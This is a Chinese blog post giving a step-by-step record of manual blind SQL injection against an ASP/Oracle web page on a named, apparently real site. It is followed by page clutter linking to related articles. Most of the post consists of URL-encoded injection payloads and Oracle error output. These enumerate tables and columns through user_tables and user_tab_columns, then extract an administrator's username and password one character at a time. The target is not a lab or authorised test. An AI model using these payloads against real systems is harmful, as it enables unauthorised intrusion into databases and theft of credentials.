Oracle注入写马,ASP+ORACLE注入手记

最新推荐文章于 2022-09-09 10:16:53 发布
最新推荐文章于 2022-09-09 10:16:53 发布
阅读量198 收藏
点赞数
文章标签: Oracle注入写马

http://et.kpworld.com/star.asp?performer=马三立;

------------------------------------------------------

OraOLEDB 错误

'80040e14' ORA-00911:

invalid character

/star.asp,行83

说明过滤了分号。

[url]http://et.kpworld.com/star.asp?performer=[/url]马三立'

----------------------------------------------------

OraOLEDB 错误

'80004005' ORA-01756:

括号内的字符串没有正确结束

/star.asp,行83

看来存在未过滤单引号问题。

[url]http://et.kpworld.com/star.asp?performer=[/url]马三立' and '1'='1

----------------------------------------------------------------

闭和他单引号,正常返回。

and 0(select count(*) from admin) and '1'='1

-----------------------------------------------------------------

OraOLEDB 错误 '80040e37' ORA-00942:

table or view does not exist

/star.asp,行83

说明不存在ADMIN这个表.

******************************************************************

下面需要知道ORACLE的系统表:

确定表中行的总数:

select num_rows from user_tables where table_name='表名

----------------------存放当前用户所有表

where table_name='表名

'selectcolumn_name,

from user_tab_columns -----------------------存放所有列

where table_name='表名'

and 0(select count(*) from all_tables) and '1'='1

---------------------------------------------------------------------

存在!

all_tables是一个系统表,用来存放当前ID和其他用户的所有表

and 0(select count(*) from user_tables) and '1'='1

---------------------------------------------------------------------

返回。有这个系统表,这个表存放当前用户的所有表

and 0(select top 1 table_name from user_tables) and '1'='1

---------------------------------------------------------------------------------

OraOLEDB 错误 '80040e14' ORA-00923:

FROM keyword not found where expected

/star.asp,行83

不支持TOP 1 ?。。。。。。这种解释好象不太理想。。。

(经过PINKEYES测试已经确定确实不支持TOP 1)

and 0(select count(*) from user_tables where table_nam'')

and '1'='1

--------------------------------------------------------------------------------------------

OraOLEDB 错误 '80040e14' ORA-00904:

invalid column name /star.asp,行83

当语法错误时,会显示无效列名字

and 0(select count(*) from user_tables where

table_name'''') and '1'='1

--------------------------------------------------------------------------------------------

语法正确时,成功返回标志,看来四个单引号表示空.接下来是对一些函数的测试:

and 0(select count(*) from user_tables where

sum(table_name)>1) and '1'='1

------------------------------------------------------------------------------------------------

OraOLEDB 错误 '80040e14' ORA-00934:

group function is not allowed here

/star.asp,行83

组函数不允许在这里。

and 0(select count(*) from user_tables where avg(table_name)) and

'1'='1

-------------------------------------------------------------------------------------------

OraOLEDB 错误 '80040e14' ORA-00934:

group function is not allowed here

/star.asp,行83

组函数不允许在这里。

and 0(select to_char(table_name) from user_tables) and%20'1'='1

--------------------------------------------------------------------------

OraOLEDB 错误 '80004005' ORA-01427:

single-row subquery returns more

than one row

/star.asp,行83

单行的子查询返回多于一行

and 0(select count(*) from user_tables where table_name+1)

and%20'1'='1

--------------------------------------------------------------------------

OraOLEDB 错误 '80040e14' ORA-00920:

invalid relational operator

/star.asp,行83

测试到这里,下面看看怎么弄出他的表来:

and 0(select count(*) from performer) and%20'1'='1

-----------------------------------------------------

成功返回。这里的表是看前面URL猜的.

and 0(select count(*) from user_tables where

table_name='performer') and%20'1'='1

-------------------------------------------------------------------------------------

没返回。失败标志。

and%200(select%20count(*)%20from%20user_tables%20where%20table_name='PERFORMER')

and%20'1'='1

------------------------------------------------------------------------------------------------

成功了! 看来这个user_tables表只认识大写字母!

and 0(select count(*) from user_tables where

length(table_name)>10) and%20'1'='1

------------------------------------------------------------------------------------

用length函数确定最长表的位数

and 0(select count(*) from user_tables where

length(table_name)=18) and%20'1'='1

-------------------------------------------------------------------------------------

省略若干步骤,最后确定最长表为18位。

and 0(select count(*) from user_tables where

substr(table_name,1,1)='A') and%20'1'='1

-----------------------------------------------------------------------------------------

第一位为'A',

and 0(select count(*) from user_tables where

substr(table_name,1,2)='AD') and%20'1'='1

-----------------------------------------------------------------------------------------

第二位为'AD'

and 0(select count(*) from user_tables where

substr(table_name,1,18)='ADMINAUTHORIZATION') and%20'1'='1

---------------------------------------------------------------------------------------------

省略若干,18位的表名为'ADMINAUTHORIZATION'。

and 1=(select count(*) from user_tables where

table_name='ADMINAUTHORIZATION') and%20'1'='1

--------------------------------------------------------------------------------------------

返回。

and 0(select count(*) from user_tables where

length(table_name)=2) and%20'1'='1

----------------------------------------------------------------------------------

最小表名长度为2

and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25user%25')%20and%20%20'1'='1

-------------------------------------------------------------------------------------------------

没返回。

and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25ADMIN%25')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25PER%25')

and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25BBS%25')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

都成功返回。看来可以利用like猜。

and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)>8)

and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)>10)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)=10)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

利用like和LENGTH组合猜,马上就能确定长度。

and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,4)='BBSS')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

猜出第四位是S。接下来就是重复劳动了。

and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,10)='BBSSUBJECT')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

猜出来了。'BBSSUBJECT'

and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='BBSSUBJECT'%20and%20column_name%20like%20'%25USER%25')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='BBSSUBJECT'%20and%20column_name%20like%20'%25USER%25')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

没返回,不象是保存用户和密码的表。再来。。。

and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)>10)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)>15)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)=15)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

确定长度为15。

and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,1)='U'%20and%20length(table_name)=15)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,2,1)='S'%20and%20length(table_name)=15)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,-4,4)='USER'%20and%20length(table_name)=15)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tables%20where%20length(table_name)=15%20and%20substr(table_name,-15,15)='UNSUBSCRIBEUSER')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tables%20where%20table_name='UNSUBSCRIBEUSER')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

确定表名'UNSUBSCRIBEUSER',接下来猜是否有密码字段。。。

and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='UNSUBSCRIBEUSER'%20and%20column_name%20like%20'%25USER%25')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='UNSUBSCRIBEUSER'%20and%20column_name%20like%20'%25PASS%25')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

like PASS,没返回,郁闷,继续。

and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25PASS%25'%20and%20length(table_name)=13)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

返回。不准确。

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,-2,2)='SS')

and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,6,2)='SS')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,4)='PASS')

and%20'1'='1

-------------------------------------------------------------------------------------------------

这里用SUBSTR缩小范围.

and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,4)='PASS'%20and%20length(column_name)=11)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

含有PASS字段的字段长度11位。根据上面的从4位开始数4位是PASS 那么PASS前是3位,后是4位,一共是11位。

and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,8)='PASSWORD')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

猜一下,果然是。。。

and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,-11,11)='STRPASSWORD')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20length(table_name)=13)

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20length(table_name)=13)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

全返回,确定密码字段名字'STRPASSWORD'。把密码字段抓到就好办了,再利用他抓表名:

and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20length(table_name)=13)

and '1'='1

-------------------------------------------------------------------------------------------------

返回,和上面猜出的表名长度符合。用SUBSTR猜出他名字:

and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20substr(table_name,1,13)='ADMINISTRATOR')

and '1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20table_name='ADMINISTRATOR')

and '1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tables%20where%20table_name='ADMINISTRATOR')

and '1'='1

-------------------------------------------------------------------------------------------------

全返回,确定表名为:'ADMINISTRATOR'.

and%208=(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR')

and '1'='1

-------------------------------------------------------------------------------------------------

猜出表里有8个字段。

and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name%20like%20'%25ID%25')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%203=(select%20count(*)%20from%20ADMINISTRATOR) and '1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,4,2)='ID')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,-2,2)='ID')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

可以判断是ID结尾了,长度为5。

and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,-5,5)='LNGID')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name='LNGID')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

出来了,LNGID。

and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20length(LNGID)=2)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%208=(select%20min(LNGID)%20from%20ADMINISTRATOR)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%2021=(select%20max(LNGID)%20from%20ADMINISTRATOR)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

最小ID,最大ID也出来,接下来弄密码:

and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20length(STRPASSWORD)=4%20and%20LNGID=8)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

LNGID为8的密码长度为4

and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,1,1))=116%20and%20LNGID=8)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

第一位

and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,2,1))=101%20and%20LNGID=8)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

第二位

and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,3,1))=115%20and%20LNGID=8)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

第三位

and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,4,1))=116%20and%20LNGID=8)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

第四位

STRPASSWORD:test

and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD='test'%20and%20LNGID=8)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

OH,YEAH~~密码出来了。

接着搞用户名:

and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name%20like%20'%25NAME%25')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,4,4)='NAME')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,-4,4)='NAME')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,1,7)='STRNAME')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

出来了,字段:STRNAME

and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name%20not%20in('STRNAME','STRPASSWORD','LNGID'))%20and%20'1'='1

-------------------------------------------------------------------------------------------------

and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD='test'%20and%20LNGID=8%20and%20length(STRNAME)=4)%20and%20'1'='1

-------------------------------------------------------------------------------------------------

STRNAME值长度为4,不会是和密码相同吧。。。

and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD='test'%20and%20LNGID=8%20and%20STRNAME='test')%20and%20'1'='1

-------------------------------------------------------------------------------------------------

呵呵,果然。

表名ADMINISTRATOR,列名:STRNAME,STRPASSWORD,LNGID

LNGID=8 STRNAME=test STRPASSWORD=test

测试完成!剩下的只是时间问题了。

肥西老母鸡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oracle ora00920,应用报ORA-00920错误
weixin_31570865的博客
04-03 3041
多谢版主,回复我的意思是在不知道是由那个sid触发的这个错误的前提下,发现是什么造成的这个错误。例如,我不知道什么时候那个sid会发生920错误。alter system set events'920 trace name errorstack level 3';SELECT partno, sno, wono, stockdtFROM stock2 a,stock3 bWHERE a.par...
ORA-39071: Value for EXCLUDE is badly formed
05-17 1504
oracle@linux-rpu7:~> expdp scott/tiger directory=qs dumpfile=scott.dmp EXCLUDE=TABLE:EMP Export: Release 10.2....
oracle无效的关联运算符,ORA-00920:使用In运算符时关系运算符无效
weixin_32446485的博客
04-03 5208
我有一张桌子col我有:select * from offc.col;我使用按年份和部门的查询返回了一些数据:SELECT dept_id,year,Max(marks) marksFROM offc.colGROUP BY dept_id,yearORDER BY dept_id,year我得到的数据是:这里没有问题,因为我的sql运行正常。col列表,所以我使用子查询作为:SELECT...
ORA-00920错误分析
congyuping9537的博客
12-10 2758
ORA-00920错误分析[@more@]ora-00920 invalid relational operator 仔细检查你所写的SQL语句。 ...
求大神看看,为什么报invalid relational operator错误
Burning_me_的博客
09-09 916
as a join (select '1' from dual union select '2' from dual union select '2' from dual union select '3' from dual union select '4' from dual union select '5' from dual union select '6' from dual) as b on 1 主要这里
Oracle也有注入漏洞
12-16
"Oracle也有注入漏洞"这个话题揭示了即便是在强大的Oracle系统中,也可能存在SQL注入问题,这是一类严重的网络安全威胁。 SQL注入是一种攻击手段,攻击者通过在应用程序的输入字段中插入恶意的SQL代码,以获取、...
oracle 不存在dual情况下注入.doc
07-18
根据提供的文档标题、描述、标签以及部分内容,本文将围绕Oracle数据库中的SQL注入技术进行深入解析,特别是当目标系统中不存在`dual`表时如何进行有效的数据挖掘。 ### Oracle SQL注入基础 在讨论具体的技术细节...
Oracle ASM + 12c R1 + Linux 6.5安装
最新发布
06-01
Oracle ASM + 12c R1 + Linux 6.5安装
ORACLE数据库手工注入详解.doc
04-08
ORACLE数据库手工注入详解
mybatis查询报错ORA-00920: 无效的关系运算符
IT夜幕的博客
02-05 5290
Mybatis 查询报错java.sql.SQLSyntaxErrorException: ORA-00920: 无效的关系运算符 当使用Mybatis-Plus的注解 @Select("select * from temp where creattime &gt;= sysdate ") 查询数据时会报错ORA-00920: 无效的关系运算符 原因是: 在使用 &gt;= 替代 >= 时,应在查询语句前添加 <script></script> 例如
asp写的简单oracle增删改查
05-24
简单易用的asp小程序,楼主自己写的,初学者,见谅哈哈~本来想加入一点ajax的,可惜还是不太会
Oracle注入写马,记录一次Oracle注入绕waf
weixin_29315091的博客
04-07 168
这个注入挺特殊的,是ip头注入。我们进行简单的探测:首先正常发起一次请求,我们发现content-type是76 探测注入我习惯性的一个单引号:一个单引号我发现长度还是76 我开始尝试单引号,双引号一起:我失败了长度还是76 一般sql注入输入单引号一般长度都会有些变化。我记录深入探测,我输入'--%20 返回了200,并且长度是0,这让我产生了一丝好奇。这里很有可能存在注入哦。我继续探测:输入-...
exhentai服务器不稳定,Exhentai的正确打开方式(以Chrome浏览器为例)
热门推荐
weixin_29041443的博客
08-12 41万+
Exhentai.org即著名绅士糟糕物分享网站E-hentai.org的里站,对于萝莉、正太或者版权侵犯的写真(比如@factory系列),在表站是无法浏览的。但如果直接访问Exhentai的话,是无法正常访问的,大概会看到这样一只国宝熊猫人。因为访问Exhentai.org时会向forums.e-hentai.org发送请求,验证Cookie,如果没有相应记录即返回一只伤心的熊猫。下面,就来介...
hibernate连接oracle的例子
朝屯暮蒙vi的博客
08-01 2477
第一次学习hibernate,跟着网上的去做,到处报错,自己做了一遍,终于好了! 一、 实验环境 eclipse、oracle11g 然后就是所需的jar包,到http://www.hibernate.org下载相应的jar,我的是hibernate-release-4.2.21.Final,解压后所需要jar为              \hibernate-release-4
一个DATE数据类型的检索
bisal的专栏
10-22 555
今天快下班时,兄弟团队过来问了个问题,一张表中的DATE类型字段在PLSQL-Developer中检索的时候,出现这种现象,如下所示,有记录存储的是"2019-01-01...
Oracle SQL 注入
prahs的专栏
07-14 8872
Oracle SQL 注入本文主要总结在Oracle注入中的步骤方法和注意事项: 参考了:http://www.freebuf.com/articles/web/5411.html 注入常用语句 常用步骤 注意事项 常用步骤1 找注入点 用单引号’之类的触发报错 用or 1=1, or 1=2之类的观察反馈 2 判断数据库类型 oracle 支持– 类型注释,但是不支持;分隔执行多语句,orac
Oracle注入
weixin_48141183的博客
11-03 6794
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 近日学习了Oracle注入,写这篇文章主要当作自己的笔记,也希望能成为大家的参考。 一、Oracle的获取数据的基本技巧 1.特殊表 • dual表 ◆ 是一个虚拟的表,用来构成select的语法规则,oracle保证dual里面永远只有一条记录。 • user_tables表 ◆ 该表的ta.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值